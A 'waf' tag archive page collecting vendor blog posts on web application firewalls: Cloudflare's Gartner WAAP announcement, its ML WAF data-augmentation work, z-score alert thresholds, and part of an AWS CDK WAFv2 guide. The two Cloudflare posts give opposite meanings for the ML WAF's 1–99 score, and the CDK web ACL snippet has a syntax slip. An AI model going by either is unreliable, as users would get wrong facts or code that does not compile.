Tag Archives: waf

Cloudflare named a Leader by Gartner

Post Syndicated from Michael Tremante original https://blog.cloudflare.com/cloudflare-waap-named-leader-gartner-magic-quadrant-2022/

Cloudflare named a Leader by Gartner

Cloudflare named a Leader by Gartner

Gartner has recognised Cloudflare as a Leader in the 2022 “Gartner® Magic Quadrant™ for Web Application and API Protection (WAAP)” report that evaluated 11 vendors for their ‘ability to execute’ and ‘completeness of vision’.

You can register for a complimentary copy of the report here.

We believe this achievement highlights our continued commitment and investment in this space as we aim to provide better and more effective security solutions to our users and customers.

Keeping up with application security

With over 36 million HTTP requests per second being processed by the Cloudflare global network we get unprecedented visibility into network patterns and attack vectors. This scale allows us to effectively differentiate clean traffic from malicious, resulting in about 1 in every 10 HTTP requests proxied by Cloudflare being mitigated at the edge by our WAAP portfolio.

Visibility is not enough, and as new use cases and patterns emerge, we invest in research and new product development. For example, API traffic is increasing (55%+ of total traffic) and we don’t expect this trend to slow down. To help customers with these new workloads, our API Gateway builds upon our WAF to provide better visibility and mitigations for well-structured API traffic for which we’ve observed different attack profiles compared to standard web based applications.

We believe our continued investment in application security has helped us gain our position in this space, and we’d like to thank Gartner for the recognition.

Cloudflare WAAP

At Cloudflare, we have built several features that fall under the Web Application and API Protection (WAAP) umbrella.

DDoS protection & mitigation

Our network, which spans more than 275 cities in over 100 countries is the backbone of our platform, and is a core component that allows us to mitigate DDoS attacks of any size.

To help with this, our network is intentionally anycasted and advertises the same IP addresses from all locations, allowing us to “split” incoming traffic into manageable chunks that each location can handle with ease, and this is especially important when mitigating large volumetric Distributed Denial of Service (DDoS) attacks.

The system is designed to require little to no configuration while also being “always-on” ensuring attacks are mitigated instantly. Add to that some very smart software such as our new location aware mitigation, and DDoS attacks become a solved problem.

For customers with very specific traffic patterns, full configurability of our DDoS Managed Rules is just a click away.

Web Application Firewall

Our WAF is a core component of our application security and ensures hackers and vulnerability scanners have a hard time trying to find potential vulnerabilities in web applications.

This is very important when zero-day vulnerabilities become publicly available as we’ve seen bad actors attempt to leverage new vectors within hours of them becoming public. Log4J, and even more recently the Confluence CVE, are just two examples where we observed this behavior. That’s why our WAF is also backed by a team of security experts who constantly monitor and develop/improve signatures to ensure we “buy” precious time for our customers to harden and patch their backend systems when necessary. Additionally, and complementary to signatures, our WAF machine learning system classifies each request providing a much wider view in traffic patterns.

Our WAF comes packed with many advanced features such as leaked credential checks, advanced analytics and alerting and payload logging.

Bot Management

It is no secret that a large portion of web traffic is automated, and while not all automation is bad, some is unnecessary and may also be malicious.

Our Bot Management product works in parallel to our WAF and scores every request with the likelihood of it being generated by a bot, allowing you to easily filter unwanted traffic by deploying a WAF Custom Rule, all this backed by powerful analytics. We make this easy by also maintaining a list of verified bots that can be used to further improve a security policy.

In the event you want to block automated traffic, Cloudflare’s managed challenge ensures that only bots receive a hard time without impacting the experience of real users.

API Gateway

API traffic, by definition, is very well-structured relative to standard web pages consumed by browsers. At the same time, APIs tend to be closer abstractions to back end databases and services, resulting in increased attention from malicious actors and often go unnoticed even to internal security teams (shadow APIs).

API Gateway, that can be layered on top of our WAF, helps you both discover API endpoints served by your infrastructure, as well detect potential anomalies in traffic flows that may indicate compromise, both from a volumetric and sequential perspective.

The nature of APIs also allows API Gateway to much more easily provide a positive security model contrary to our WAF: only allow known good traffic and block everything else. Customers can leverage schema protection and mutual TLS authentication (mTLS) to achieve this with ease.

Page Shield

Attacks that leverage the browser environment directly can go unnoticed for some time, as they don’t necessarily require the back end application to be compromised. For example, if any third party JavaScript library used by a web application is performing malicious behavior, application administrators and users may be none the wiser while credit card details are being leaked to a third party endpoint controlled by an attacker. This is a common vector for Magecart, one of many client side security attacks.

Page Shield is solving client side security by providing active monitoring of third party libraries and alerting application owners whenever a third party asset shows malicious activity. It leverages both public standards such as content security policies (CSP) along with custom classifiers to ensure coverage.

Page Shield, just like our other WAAP products, is fully integrated on the Cloudflare platform and requires one single click to turn on.

Security Center

Cloudflare’s new Security Center is the home of the WAAP portfolio. A single place for security professionals to get a broad view across both network and infrastructure assets protected by Cloudflare.

Moving forward we plan for the Security Center to be the starting point for forensics and analysis, allowing you to also leverage Cloudflare threat intelligence when investigating incidents.

The Cloudflare advantage

Our WAAP portfolio is delivered from a single horizontal platform, allowing you to leverage all security features without additional deployments. Additionally, scaling, maintenance and updates are fully managed by Cloudflare allowing you to focus on delivering business value on your application.

This applies even beyond WAAP, as, although we started building products and services for web applications, our position in the network allows us to protect anything connected to the Internet, including teams, offices and internal facing applications. All from the same single platform. Our Zero Trust portfolio is now an integral part of our business and WAAP customers can start leveraging our secure access service edge (SASE) with just a few clicks.

If you are looking to consolidate your security posture, both from a management and budget perspective, application services teams can use the same platform that internal IT services teams use, to protect staff and internal networks.

Continuous innovation

We did not build our WAAP portfolio overnight, and over just the past year we’ve released more than five major WAAP portfolio security product releases. To showcase our speed of innovation, here is a selection of our top picks:

  • API Shield Schema Protection: traditional signature based WAF approaches (negative security model) don’t always work well with well-structured data such as API traffic. Given the fast growth in API traffic across the network we built a new incremental product that allows you to enforce API schemas directly at the edge using a positive security model: only let well-formed data through to your origin web servers;
  • API Abuse Detection: complementary to API Schema Protection, API Abuse Detection warns you whenever anomalies are detected on your API endpoints. These can be triggered by unusual traffic flows or patterns that don’t follow normal traffic activity;
  • Our new Web Application Firewall: built on top of our new Edge Rules Engine, the core Web Application Firewall received a complete overhaul, all the way from engine internals to the UI. Better performance both in terms of latency and efficacy at blocking malicious payloads, along with brand-new capabilities including but not limited to Exposed Credential Checks, account wide configurations and payload logging;
  • DDoS customizable Managed Rules: to provide additional configuration flexibility, we started exposing some of our internal DDoS mitigation managed rules for custom configurations to further reduce false positives and allow customers to increase thresholds / detections as required;
  • Security Center: Cloudflare view on infrastructure and network assets, along with alerts and notifications for miss configurations and potential security issues;
  • Page Shield: based on growing customer demand and the rise of attack vectors focusing on the end user browser environment, Page Shield helps you detect whenever malicious JavaScript may have made its way into your application’s code;
  • API Gateway: full API management, including routing directly from the Cloudflare edge, with API Security baked in, including encryption and mutual TLS authentication (mTLS);
  • Machine Learning WAF: complementary to our WAF Managed Rulesets, our new ML WAF engine, scores every single request from 1 (clean) to 99 (malicious) giving you additional visibility in both valid and non-valid malicious payloads increasing our ability to detect targeted attacks and scans towards your application;

Looking forward

Our roadmap is packed with both new application security features and improvements to existing systems. As we learn more about the Internet we find ourselves better equipped to keep your applications safe. Stay tuned for more.

Gartner, “Magic Quadrant for Web Application and API Protection”, Analyst(s): Jeremy D’Hoinne, Rajpreet Kaur, John Watts, Adam Hils, August 30, 2022.

Gartner and Magic Quadrant are registered trademarks of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved.
Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation.

Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

Improving the accuracy of our machine learning WAF using data augmentation and sampling

Post Syndicated from Vikram Grover original https://blog.cloudflare.com/data-generation-and-sampling-strategies/

Improving the accuracy of our machine learning WAF using data augmentation and sampling

Improving the accuracy of our machine learning WAF using data augmentation and sampling

At Cloudflare, we are always looking for ways to make our customers’ faster and more secure. A key part of that commitment is our ongoing investment in research and development of new technologies, such as the work on our machine learning based Web Application Firewall (WAF) solution we announced during security week.

In this blog, we’ll be discussing some of the data challenges we encountered during the machine learning development process, and how we addressed them with a combination of data augmentation and generation techniques.

Let’s jump right in!

Introduction

The purpose of a WAF is to analyze the characteristics of a HTTP request and determine whether the request contains any data which may cause damage to destination server systems, or was generated by an entity with malicious intent. A WAF typically protects applications from common attack vectors such as cross-site-scripting (XSS), file inclusion and SQL injection, to name a few. These attacks can result in the loss of sensitive user data and damage to critical software infrastructure, leading to monetary loss and reputation risk, along with direct harm to customers.

How do we use machine learning for the WAF?

The Cloudflare ML solution, at a high level, trains a classifier to distinguish between various traffic types and attack vectors, such as SQLi, XSS, Command Injection, etc. based on structural or statistical properties of the content. This is achieved by performing the following operations:

  1. We inspect the raw HTTP input and perform some number of transformations on it such as normalization, content substitutions, or de-duplication.
  2. Decompose or partition it via some process of tokenization, generate statistical information about the content, or extract structural data.
  3. Compute optimal internal numerical representations of the inputs via the process of training the model. The nature of these internal representations depends on the class of model and architecture.
  4. Learn to map internal content representations against classes (XSS, SQLi or others), scores or some other target of interest.
  5. At run-time, use previously learned representations and mappings to analyze a new input and provide the most likely label or score for it. The score ranges from 1 to 99, with 1 indicating that the request is almost certainly malicious and 99 indicating that the request is probably clean.
Improving the accuracy of our machine learning WAF using data augmentation and sampling

This reasonable starting point stumbles immediately upon a critical challenge right from the start: we need high quality labeled data, and lots of it as that has the biggest impact on model performance. Contrary to well-researched fields like image recognition, text sentiment analysis, or classification, large datasets of HTTP requests with malicious payloads embedded are difficult to get.

To make matters even harder, strict implementation requirements for a production-quality WAF restrict the complexity of our potential ML models or architectures to ones that are relatively simple and light-weight, implying that we cannot simply pave over shortcomings of the data.

Data and challenges

The selection of a dataset is likely the most difficult of all the aspects that contribute to the final set of attributes of a machine learning model. In most cases, the model is tasked with learning the distribution of the data in some statistical sense, thus choosing and curating the dataset to ensure that the desired properties of the final solution are even possible to learn is incredibly crucial! ML models are only as reliable as the data used to train them. If we train an ML model on an incomplete dataset, or on data that doesn’t accurately represent the population, predictions might be inaccurate as they will be a direct reflection of the data.

To build a strong ML WAF, a good dataset must have large volumes of heterogeneous data covering malicious samples for all attack categories, a diverse set of negative/benign samples, and samples representing a broad spectrum of obfuscation techniques.

Due to those constraints, creating a solid dataset has a number of challenges:

Privacy

Privacy requirements limit data availability and how it can be used. Cloudflare has strict privacy guidelines and does not keep all request data – it simply isn’t available, and what is available must be carefully selected, anonymised, and stripped of sensitive information.

Heterogeneity of samples

Due to the wide assortment of potential request content types and forms, finding enough benign samples is difficult. Furthermore, it is challenging to collect data that represents requests with various charsets and content-encodings. Covering all attack configurations is also important because some attacks can be inserted into essentially any kind of request (e.g. five bytes in a huge “regular” request)

Sample difficulty

We want a dataset with a good mix of attack techniques and isn’t dominated by the ones that are easily generated by tools which simply swap out constants, transform expressions through invariants, and so on (sqli-fuzzer). Additionally, the vast majority of freely available samples in the wild are fairly trivial auto-generated payloads as part of indiscriminate scanning and discovery tools. They have very similar structural and statistical characteristics. Some of them are fairly old as well and do not reflect the current software landscape. How to “grade” the sample difficulty is not immediately obvious! What’s easy to a human may not be easy for a particular preprocessor/model, and vice-versa.

Noisy labels

Label noise affects results a lot, especially when it comes to esoteric, specific, or unusual attacks which are likely to be classified as benign by rules WAF.

What’s the strategy to overcome this?

Data augmentation

In simple terms, Data Augmentation is a process of generating artificial (but realistic) data to increase the diversity of our data by studying statistical distribution of existing real-world data.

This is crucial for us because one of the biggest concerns with rules-based WAFs is false positives. False positives are a serious challenge for WAFs because the risk of accidentally filtering legitimate traffic deters users from employing very strict rulesets. Data augmentation is used to build a solution that does not rely on observing specific high-risk keywords or character sequences, but instead uses a more holistic analysis of content and context, making it considerably less likely to block legitimate requests.

There are many sequences of characters which appear almost exclusively in payloads, but are themselves not dangerous. In order to reduce false positives and improve overall performance, we focussed on generating a lot of heterogeneous negative samples to force the model to consider the structural, semantic, and statistical properties of the content when making a classification decision.

In the context of our data and use cases, data augmentation means that we mutate benign content in a variety of ways as the content will remain benign (this isn’t going to accidentally turn it into a valid payload, with probability 1). For instance, we can add random character noise, permute keywords, merge benign content together from multiple sources, and so on. Alternatively, we can seed benign content with ‘dangerous’ keywords or ngrams frequently occuring in payloads – this results in a benign sample, but ideally will teach the model not to be too sensitive to the presence of malicious tokens lacking the proper semantics and structure.

Benign content

First and foremost, generating benign content is way easier. Mutating a malicious block of content into different malicious blocks is difficult because malicious payloads have a stricter grammar and syntax than general HTTP content due to the fact that it has code, therefore they must be manipulated in a specific manner.

However, there are a few options  if we want to do this in the future. Tools like sqli-fuzzer,  automates the process of fuzzing a given payload by applying transformations which preserve the underlying semantics while changing the representation or adding obfuscation. Outside existing third-party tools, it’s possible to generate our own malicious payloads using various “append malicious content to non-malicious content” techniques, with the trade off that this doesn’t actually generate *new* malicious content, just puts it into a different context.

Pseudo-random noise samples

A useful approach we identified for bolstering the number of negative training samples was to generate large quantities of pseudo-random strings of increasing complexity.

The probability of any pseudo-random string (drawn from essentially any token distribution) being a valid payload or malicious attack is essentially zero, but we can build a series of token sampling distributions that make it increasingly difficult for the model to distinguish them from a real payload, and we discovered that this resulted in dramatically better performance in terms of false positive rate, robustness, and overall model properties.

This approach works by taking a collection of tokens and a probability distribution over these tokens, and independently sampling a stream of tokens from it to create our ‘sample’. Each sample length is selected from a separate discrete sample length distribution.

For an extremely simple example, we could take a token collection consisting of ASCII characters and a uniform sampling distribution:

['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9']

We sample random strings of length 0-32 from this to get some (uninteresting) negative samples:

8hwk1d740hfstbb4aogbpi4qayppvdl41b6blornuzktp4yl

1deq7rug1zftmn9tjr73yttjnye99zh2140z2x9lr8n6sxhucdgn6bmqvfv7auw8fwbkrtxilk45ht-

We wouldn’t expect even a very simple model to struggle to learn that these samples are benign,  but as we increase the complexity of the token collections, we can move towards much more ‘difficult’ noise examples, including elements such as: fragments of valid URIs, user agents, XML/XSLT content or even restricted language identifiers, or keywords.

Here are some examples of more complex token collections and the kinds of random strings they produce as our negative samples:

Ascii_script: alphanumeric characters plus  ‘<‘, ‘>’, ‘/’, ‘</’, ‘-‘, ‘+’, ‘=’, ‘< ‘, ‘ >’, ‘ ‘, ‘ />’

Improving the accuracy of our machine learning WAF using data augmentation and sampling

alphanumerics, plus special characters, plus a variant of full javascript or sql keywords and (multi-character) sub-token fragments

Improving the accuracy of our machine learning WAF using data augmentation and sampling

It’s fairly straightforward to construct a suite of these noise generators of varying complexity, and targeting different types of content: JSON, XML, URIs with SQL-esque ‘noise’, and so on. As the strings get sufficiently long, the probability that they will contain at least some dangerous looking subsequences grows, so it’s also an excellent test of model robustness.

We make extensive use of noise strings to enhance the core dataset used for training and testing the model by directly training the model on increasingly difficult noise before fine-tuning on exclusively real data, appending noise of varying complexity to malicious(real) samples or benign samples to both induce and test for model robustness for padding attacks, and estimating false positive rate for certain classes of benign content.

Beyond independent sampling of random strings?

A natural extension to the above method for generating pseudo-random strings is to drop the ‘independence’ assumption for sampling tokens. This means that we’re starting to emulate the process by which real data is generated, to some extent, yielding samples with increasingly realistic local (and eventually global) structure. Some approaches for this might include a simple Markov chain, and extend all the way to state-of-the-art Large Language Models.

We experimented with using contemporary autoregressive language models trained on our corpus of real malicious payloads and found it extremely effective at generating novel payloads, as well as transforming payloads into sophisticated obfuscated representations. As the language models approached convergence on the data the likelihood of each sample being a valid payload approached 100%, allowing us to use early samples as ‘extremely strong negatives’ and the later samples as positive samples. The success of this work has suggested that deeper investigation into the use of language models for security analysis may be fruitful, not only for training classifiers, but also for creating powerful adversarial pen-testing agents.

Results summary

Let’s see a comparative summary of results and improvements, before and after the augmentation:

Model performance on evaluation metrics

The effectiveness of machine learning models for classification problems can be evaluated using a wide range of metrics, including accuracy, precision, recall, F1 Score, and others. It is important to note that in addition to using quantitative metrics, we also consider the model’s general properties and behavioral constraints. This criteria and metrics-based approach is especially important in our domain where data is inherently noisy, labels are not trustworthy, the domain of the inputs is extremely large, and hard to cover with samples.

For this post, we will concentrate on key quantitative metrics like F1 score even though we examine a variety of metrics to assess the model performance. F1 score is the weighted average (harmonic mean) of precision and recall. We can represent the F1 score with the formula:

Improving the accuracy of our machine learning WAF using data augmentation and sampling

Where,

True Positives (TP): malicious content classified correctly by the model

False Positives (FP): benign content that the model classified as malicious

True Negatives (TN): benign content classified correctly by the model

False Negatives (FN): malicious content that the model classified as benign

Since this formula takes false positives and false negatives into consideration, this score is more reliable than other metrics. There are a few methods to calculate this for multi-class problems, like Macro F1 Score, Micro F1 Score and Weighted F1 Score. Although each method has advantages and disadvantages, we obtained nearly identical results with all three methods. Below are the numbers:

Without Augmentation With Augmentation
Class Precision Recall F1 Score Precision Recall F1 Score
Benign 0.69 0.17 0.27 0.98 1.00 0.99
SQLi 0.77 0.96 0.85 1.00 1.00 1.00
XSS 0.56 0.94 0.70 1.00 0.98 0.99
Total(Micro Average) 0.67 0.99
Total(Macro Average) 0.67 0.69 0.61 0.99 0.99 0.99
Total(Weighted Average) 0.68 0.67 0.60 0.99 0.99 0.99

The important takeaway is that the range of this F1 score is best at 1 and worst at 0.

The model after augmentation appears to have similar precision and recall with good overall performance, as indicated by a value of 0.99 after augmentation, compared to 0.61 for Macro F1.

So far in the results summary, we’ve only discussed F1 Score; however, there are other improvements in characteristics that we’ve observed in the model that are listed below:

False positive characteristics

  • Estimated false positive rate reduced by approximately 80% on test data sets. There are significantly fewer false positives involving PromQL and other SQL-structured analogues. PromQL examples result in high scores and are classified correctly:
Improving the accuracy of our machine learning WAF using data augmentation and sampling

Today, the only major category of false positives are literal SQL or JavaScript files.

  • General false positive rate on noise from JSON-esque, XML/SOAP-esque, and SQL-esque content-generators reduced to about a 1/100,000 rate from about 1/50 to 1/1.

True positive characteristics

  • True positive rate for highly fuzzed content is vastly improved. Models trained solely on real data were easily bypassed by advanced fuzzing tools, whereas models trained on real plus augmented data are extremely resistant, with many payloads receiving higher risk scores as fuzzing increases. Examples:
Improving the accuracy of our machine learning WAF using data augmentation and sampling

These yield approximately same scores as they are a result of only a few byte   alterations

  • Proportion of client-provided test sets that primarily contain payloads not blocked by rules-waf for XSS/SQLi successfully classified is about 97.5% (with the remaining 2.5% being arguable) up from about 91%.
  • Padding a payload with almost any amount of ASCII, JSON-esque, special-characters, or other content will not reduce the risk score substantially. Due to the addition of hard noise long length augmented training samples, even a six byte payload in a 100 kilobyte string will be caught. Examples:
Improving the accuracy of our machine learning WAF using data augmentation and sampling

They both generate similar scores even though the latter has junk padding around the payload.

Execution performance

  • Runtime characteristics are unchanged for inference.

On top of that, we validated the model against the Cloudflare’s highly mature signature-based WAF and confirmed that machine learning WAF performs comparable to signature WAF, with the ML WAF demonstrating its strength particularly in cases of correctly handling highly obfuscated or irregularly fuzzed content (as well as avoiding some rules-based engine false positives). ​​Finally, we were able to conclude that augmentation helps in improving the model performance and induce the right set of properties.

Conclusion

We built a machine learning powered WAF, with the substantial challenge to gather a diversified training set, given constraints to avoid sensitive real customer data for privacy and regulatory considerations. To create a broader and diversified dataset without requiring vast amounts of sensitive data, we used techniques such as fuzzing, data augmentation, and synthetic data generation. This allowed us to improve the solution’s false positive robustness and overall model performance.

Furthermore, these techniques reduced the time complexity required to retrieve/clean real data, and helped induce the correct model behavior. In the future, we intend to investigate autoregressive language models to generate synthetic pseudo-valid payloads.

Introducing thresholds in Security Event Alerting: a z-score love story

Post Syndicated from Kristina Galicova original https://blog.cloudflare.com/introducing-thresholds-in-security-event-alerting-a-z-score-love-story/

Introducing thresholds in Security Event Alerting: a z-score love story

Introducing thresholds in Security Event Alerting: a z-score love story

Today we are excited to announce thresholds for our Security Event Alerts: a new and improved way of detecting anomalous spikes of security events on your Internet properties. Previously, our calculations were based on z-score methodology alone, which was able to determine most of the significant spikes. By introducing a threshold, we are able to make alerts more accurate and only notify you when it truly matters. One can think of it as a romance between the two strategies. This is the story of how they met.

Author’s note: as an intern at Cloudflare I got to work on this project from start to finish from investigation all the way to the final product.

Once upon a time

In the beginning, there were Security Event Alerts. Security Event Alerts are notifications that are sent whenever we detect a threat to your Internet property. As the name suggests, they track the number of security events, which are requests to your application that match security rules. For example, you can configure a security rule that blocks access from certain countries. Every time a user from that country tries to access your Internet property, it will log as a security event. While a security event may be harmless and fired as a result of the natural flow of traffic, it is important to alert on instances when a rule is fired more times than usual. Anomalous spikes of too many security events in a short period of time can indicate an attack. To find these anomalies and distinguish between the natural number of security events and that which poses a threat, we need a good strategy.

The lonely life of a z-score

Before a threshold entered the picture, our strategy worked only on the basis of a z-score. Z-score is a methodology that looks at the number of standard deviations a certain data point is from the mean. In our current configuration, if a spike crosses the z-score value of 3.5, we send you an alert. This value was decided on after careful analysis of our customers’ data, finding it the most effective in determining a legitimate alert. Any lower and notifications will get noisy for smaller spikes. Any higher and we may miss out on significant events. You can read more about our z-score methodology in this blog post.

The following graphs are an example of how the z-score method works. The first graph shows the number of security events over time, with a recent spike.

Introducing thresholds in Security Event Alerting: a z-score love story

To determine whether this spike is significant, we calculate the z-score and check if the value is above 3.5:

Introducing thresholds in Security Event Alerting: a z-score love story

As the graph shows, the deviation is above 3.5 and so an alert is triggered.

However, relying on z-score becomes tricky for domains that experience no security events for a long period of time. With many security events at zero, the mean and standard deviation depress to zero as well. When a non-zero value finally appears, it will always be infinite standard deviations away from the mean. As a result, it will always trigger an alert even on spikes that do not pose any threat to your domain, such as the below:

Introducing thresholds in Security Event Alerting: a z-score love story

With five security events, you are likely going to ignore this spike, as it is too low to indicate a meaningful threat. However, the z-score in this instance will be infinite:

Introducing thresholds in Security Event Alerting: a z-score love story

Since a z-score of infinity is greater than 3.5, an alert will be triggered. This means that customers with few security events would often be overwhelmed by event alerts that are not worth worrying about.

Letting go of zeros

To avoid the mean and standard deviation becoming zero and thus alerting on every non-zero spike, zero values can be ignored in the calculation. In other words, to calculate the mean and standard deviation, only data points that are higher than zero will be considered.

With those conditions, the same spike to five security events will now generate a different z-score:

Introducing thresholds in Security Event Alerting: a z-score love story

Great! With the z-score at zero, it will no longer trigger an alert on the harmless spike!

But what about spikes that could be harmful? When calculations ignore zeros, we need enough non-zero data points to accurately determine the mean and standard deviation. If only one non-zero value is present, that data point determines the mean and standard deviation. As such, the mean will always be equal to the spike, z-score will always be zero and an alert will never be triggered:

Introducing thresholds in Security Event Alerting: a z-score love story

For a spike of 1000 events, we can tell that there is something wrong and we should trigger an alert. However, because there is only one non-zero data point, the z-score will remain zero:

Introducing thresholds in Security Event Alerting: a z-score love story

The z-score does not cross the value 3.5 and an alert will not be triggered.

So what’s better? Including zeros in our calculations can skew the results for domains with too many zero events and alert them every time a spike appears. Not including zeros is mathematically wrong and will never alert on these spikes.

Threshold, the prince charming

Clearly, a z-score is not enough on its own.

Instead, we paired up the z-score with a threshold. The threshold represents the raw number of security events an Internet property can have, below which an alert will not be sent. While z-score checks whether the spike is at least 3.5 standard deviations above the mean, the threshold makes sure it is above a certain static value. If both of these conditions are met, we will send you an alert:

Introducing thresholds in Security Event Alerting: a z-score love story

The above spike crosses the threshold of 200 security events. We now have to check that the z-score is above 3.5:

Introducing thresholds in Security Event Alerting: a z-score love story

The z-score value crosses 3.5 and an alert will be sent.

A threshold for the number of security events comes as the perfect complement. By itself, the threshold cannot determine whether something is a spike, and would simply alert on any value crossing it. This blog post describes in more detail why thresholds alone do not work. However, when paired with z-score, they are able to share their strengths and cover for each other’s weaknesses. If the z-score falsely detects an insignificant spike, the threshold will stop the alert from triggering. Conversely, if a value does cross the security events threshold, the z-score ensures there is a reasonable variance from the data average before allowing an alert to be sent.

The invaluable value

To foster a successful relationship between the z-score and security events threshold, we needed to determine the most effective threshold value. After careful analysis of our previous attacks on customers, we set the value to 200. This number is high enough to filter out the smaller, noisier spikes, but low enough to expose any threats.

Am I invited to the wedding?

Yes, you are! The z-score and threshold relationship is already enabled for all WAF customers, so all you need to do is sit back and relax. For enterprise customers, the threshold will be applied to each type of alert enabled on your domain.

Happily ever after

The story certainly does not end here. We are constantly iterating on our alerts, so keep an eye out for future updates on the road to make our algorithms even more personalized for your Internet properties!

Easily protect your AWS CDK-defined infrastructure with AWS WAFv2

Post Syndicated from Ramon Lopez Narvaez original https://aws.amazon.com/blogs/devops/easily-protect-your-aws-cdk-defined-infrastructure-with-aws-wafv2/

Security is a shared responsibility between AWS and the customer. When we use infrastructure as code (IaC) we want to describe workloads wholistically, and that includes the configuration of firewalls alongside the entrypoints to web applications. As we evolve the infrastructure that our application is built upon, we can adjust firewall rules in the same place.

In this post, you’ll learn how you can easily add a layer of protection to your web application that is defined in AWS Cloud Development Kit (AWS CDK) and built using Amazon CloudFront, Amazon API Gateway, Application Load Balancer, or AWS AppSync.

To accomplish this, we’ll use AWS WAFv2. Although it’s usually complex to write your own firewall rules, we can simply use AWS Managed Rules. No tedious setup required!

What is AWS WAFv2?

AWS WAFv2 is a managed web application firewall. It can be natively enabled on CloudFront, API Gateway, Application Load Balancer, or AWS AppSync and is deployed alongside these services. AWS services terminate the TCP/TLS connection, process incoming HTTP requests, and then pass the request to AWS WAF for inspection and filtering.

For example, you can use AWS WAFv2 to protect against attacks, such as cross-site request forgery (CSRF), cross-site scripting (XSS), and SQL injection (SQLi) among other threats in the OWASP Top 10.

AWS Managed Rules for AWS WAF is a set of AWS WAF rules curated and maintained by the AWS Threat Research Team that provides protection against common application vulnerabilities or other unwanted traffic, without having to write your own rules.

Prerequisites

For this walkthrough, you should have the following prerequisites:

  • An AWS account
  • An application fronted by one or more of the following services: Amazon Cloudfront, Amazon API Gateway, Application Load Balancer or AWS AppSync. From here on these are called ‘entrypoint’.
  • At least the above mentioned ‘entrypoint’ defined in AWS CDK.

Solution overview

When AWS WAF is applied to Amazon CloudFront, Amazon API Gateway, Application Load Balancer, or AWS AppSync, it inspects and filters requests before they’re forwarded to your compute infrastructure.

Figure 1. AWS WAFv2 can protect endpoints built by Amazon CloudFront, Amazon API Gateway, Application Load Balancer and AWS AppSync

Given that you have an existing web application defined in AWS CDK, we want to add a WAFv2 web ACL to its entrypoint. Instead of writing our own firewall rules to inspect and filter requests, we want to leverage an AWS Managed Rules rule group. Simultaneously, we must be able to disable or reconfigure some of the rules in the case that they cause undesirable behavior in the application.

A good first rule group to use is the core rule set (CRS) managed rule group, also named AWSManagedRulesCommonRuleSet. It contains rules that are generally applicable to web applications and provides protection against exploitation of various vulnerabilities, such as the ones described in the OWASP Top 10. You can later add more managed rule groups or write your own rules, which are specific to your application (e.g., for Windows, Linux, or WordPress).

Define the AWS WAFv2 web ACL

First, let’s give the AWS WAF module a nicely readable name:

import { aws_wafv2 as wafv2 } from 'aws-cdk-lib';

Then, we define the AWS WAFv2 web ACL in AWS CDK:

const cfnWebACL = new wafv2.CfnWebACL(this,'MyCDKWebAcl'
      defaultAction: {
        allow: {}
      },
      scope: 'REGIONAL',
      visibilityConfig: {
        cloudWatchMetricsEnabled: true,
        metricName:'MetricForWebACLCDK',
        sampledRequestsEnabled: true,
      },
      name:‘MyCDKWebAcl’,
      rules: [{
        name: 'CRSRule',
        priority: 0,
        statement: {
          managedRuleGroupStatement: {
            name:'AWSManagedRulesCommonRuleSet',
            vendorName:'AWS'
          }
        },
        visibilityConfig: {
          cloudWatchMetricsEnabled: true,
          metricName:'MetricForWebACLCDK-CRS',
          sampledRequestsEnabled: true,
        },
        overrideAction: {
          none: {}
        },
      }]
    });

The highlighted line references the CRS managed rule group as one Rule in the list. You could add more Rule elements, either referencing the managed rule groups or custom rules.

Note the scope attribute. If you want to attach this web ACL to an API Gateway, AWS AppSync API, or Application Load Balancer, then it will be REGIONAL. If you want to attach it to a CloudFront distribution, then make sure that your AWS WAFv2 web ACL is defined in the US East (N. Virginia) Region and the scope is CLOUDFRONT.

Attach the AWS WAFv2 web ACL to an Application Load Balancer, AWS AppSync API, or API Gateway

Now that we have a web ACL defined, we must attach it to a resource. This works exactly the same across API Gateway API’s, an AWS AppSync API, or an Application Load Balancer. We must create a CfnWebACLAssociation and point it to the previously created web ACL and the resource to protect:

const cfnWebACLAssociation = new wafv2.CfnWebACLAssociation(this,'MyCDKWebACLAssociation', {
      resourceArn:<ARN of resource to protect>,
      webAclArn:cfnWebACL.attrArn,
    });

Amazon Resource Names (ARNs) uniquely identify AWS resources. The highlighted line shows how AWS CDK lets you get the ARN of the previously defined CfnWebAcl.

Depending on what type of service you’re using, jump to one of the three following sections to learn how to retrieve the resourceArn of API Gateway, AWS AppSync, or Application Load Balancers.

Retrieving ARN for AWS AppSync API’s

To retrieve the ARN of an AWS AppSync API, call the .arn property:

const api = new appsync.GraphqlApi(…)
const cfnWebACLAssociation = new wafv2.CfnWebACLAssociation(this,'MyCDKWebACLAssociation', {
      resourceArn:api.arn,
      webAclArn: cfnWebACL.attrArn,
    });

Retrieving ARN for Amazon API Gateway REST API’s

In this case, we must specify which stage of the REST API we want to protect with the web ACL. Then, we reference the ARN of the stage:

const api = new apigateway.RestApi(…)
const deployment = new apigateway.Deployment(…)
const stage = apigateway.Stage(…)
const cfnWebACLAssociation = new wafv2.CfnWebACLAssociation(this,'MyCDKWebACLAssociation', {
      resourceArn:stage.stageArn,
      webAclArn: cfnWebACL.attrArn,
    });

Retrieving ARN for Application Load Balancers

If you’re dealing with an Application Load Balancer, then this is how you can retrieve its ARN:

const lb = new elbv2.ApplicationLoadBalancer(…)

const cfnWebACLAssociation = new wafv2.CfnWebACLAssociation(this,'MyCDKWebACLAssociation', {
      resourceArn:lb.loadBalancerArn,
      webAclArn: cfnWebACL.attrArn,
    });

Attach the AWS WAFv2 web ACL to a CloudFront distribution

Attaching a web ACL to CloudFront follows a different approach. Instead of defining a cfnWebACLAssociation, we reference the web ACL inside of the Distribution definition:

const distribution = new cloudfront.Distribution(this,'distro', {
      defaultBehavior: {
        origin: new origins.S3Origin(s3Bucket)
      },
     webAclId:cfnWebACL.attrArn
    });

Note that even though the property is called webAclId, because we’re using AWS WAFv2, we must supply the ARN of the web ACL.

Exclude rules from the web ACL

